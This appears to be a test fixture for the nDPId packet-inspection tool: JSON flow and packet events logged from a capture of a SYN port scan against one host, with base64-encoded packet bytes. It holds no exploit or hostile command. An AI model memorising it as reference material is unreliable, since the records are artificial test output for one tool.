-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsO7gAADEG27qsEAAIQA2GNIzTA3DdU4MZAAAAAGACCAAtHAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3wAACkGs\/asEAAIQA2GNIzTAivdU4MZAAAAAGACCAAuYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsf5AAAC0Gm+KsEAAIQA2GNIzTFxDdU4MZAAAAAGACCAAZfAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAszRsAACoGUVesEAAIQA2GNIzTD1DdU4MZAAAAAGACDAAdPAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKUAADIGqc2sEAAIQA2GNIzTNZrdU4MZAAAAAGACDAD28QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsvVQAAC4GXR6sEAAIQA2GNIzTBDLdU4MZAAAAAGACDAAoWgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAstv8AADQGXXOsEAAIQA2GNIzTAwndU4MZAAAAAGACBAAxgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbq4AADkGoMSsEAAIQA2GNIzTH5PdU4MZAAAAAGACCAAQ+QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs2EwAACoGRiasEAAIQA2GNIzTCBTdU4MZAAAAAGACDAAkeAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsPR8AADoG0VOsEAAIQA2GNIzTBEbdU4MZAAAAAGACDAAoRgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjwAADAGmjasEAAIQA2GNIzTD83dU4MZAAAAAGACBAAkvwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs8dMAADoGHJ+sEAAIQA2GNIzTI4vdU4MZAAAAAGACDAAJAQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsObwAAC8G37asEAAIQA2GNIzT3aLdU4MZAAAAAGACEABK6QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061007,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_packet_id":1,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061007,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHsAACkGdvesEAAIQA2GNIzTgAndU4MZAAAAAGACCACwggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061008,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_packet_id":1,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061008,"pkt":"ACYLMQczACWzv5HuCABFAAAsLtsAADoG35esEAAIQA2GNIzTAxPdU4MZAAAAAGACDAApeQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJAAACUG0uKsEAAIQA2GNIzTI5fdU4MZAAAAAGACCAAM9QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsmLwAAC0GgrasEAAIQA2GNIzTAiDdU4MZAAAAAGACCAAubAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsaTkAADMGrDmsEAAIQA2GNIzTIL\/dU4MZAAAAAGACEAAHzQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/QMAADYGFW+sEAAIQA2GNIzSw1DdUoMYAAAAAGACDABpPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsj3AAADkGgAKsEAAIQA2GNIzSF\/HdUoMYAAAAAGACCAAYngAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsPl0AADAG2hWsEAAIQA2GNIzSDRfdUoMYAAAAAGACBAAneAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs24AAAC0GP\/KsEAAIQA2GNIzSzlbdUoMYAAAAAGACCABiOAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Y8AACcGN+OsEAAIQA2GNIzSPpLdUoMYAAAAAGACEADp\/AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsLOEAACsG8JGsEAAIQA2GNIzSwA\/dUoMYAAAAAGACEABofwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsboUAADIGp+2sEAAIQA2GNIzSGoXdUoMYAAAAAGACDAASCgAAAgQFtA=="} 